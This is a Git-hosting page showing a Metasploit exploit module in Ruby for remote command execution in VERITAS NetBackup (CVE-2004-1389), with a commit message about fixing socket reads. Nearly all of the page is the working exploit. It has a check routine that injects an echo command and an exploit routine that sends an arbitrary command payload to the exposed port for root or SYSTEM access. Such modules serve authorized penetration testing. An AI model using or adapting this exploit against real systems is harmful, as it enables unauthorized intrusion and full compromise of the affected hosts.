adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
5df614d39bcaffbb2eccd271bd0d63bb72b8ea7a
metasploit-gs/modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb
T
HD Moore 6e80481384 Fix bad use of sock.get() and check() implementations 
Many of these modules uses sock.get() when they meant get_once()
and their HTTP-based checks were broken in some form. The response
to the sock.get() was not being checked against nil, which would
lead to stack traces when the service did not reply (a likely
case given how malformed the HTTP requests were).
2014-06-28 16:05:05 -05:00

91 lines
2.1 KiB
Ruby
Raw Blame History

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'VERITAS NetBackup Remote Command Execution',
'Description' => %q{
This module allows arbitrary command execution on an
ephemeral port opened by Veritas NetBackup, whilst an
administrator is authenticated. The port is opened and
allows direct console access as root or SYSTEM from
any source address.
},
'Author' => [ 'patrick' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2004-1389' ],
[ 'OSVDB', '11026' ],
[ 'BID', '11494' ],
[ 'URL', 'http://seer.support.veritas.com/docs/271727.htm' ],
],
'Privileged' => true,
'Platform' => %w{ linux unix win },
'Arch' => ARCH_CMD,
'Payload' =>
{
'Space' => 1024,
'BadChars' => '',
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl telnet',
}
},
'Targets' =>
[
['Automatic', { }],
],
'DisclosureDate' => 'Oct 21 2004',
'DefaultTarget' => 0))
end
def check
connect
sploit = rand_text_alphanumeric(10)
buf = "\x20\x20\x201\x20\x20\x20\x20\x20\x201\necho #{sploit}\n"
sock.put(buf)
banner = sock.get_once
disconnect
if banner.to_s.index(sploit)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
connect
sploit = payload.encoded.split(" ")
buf = "\x20\x20\x201\x20\x20\x20\x20\x20\x201\n"
buf << payload.encoded
buf << "\n"
sock.put(buf)
res = sock.get_once
print_status(res.to_s)
handler
disconnect
end
end
Reference in New Issue View Git Blame Copy Permalink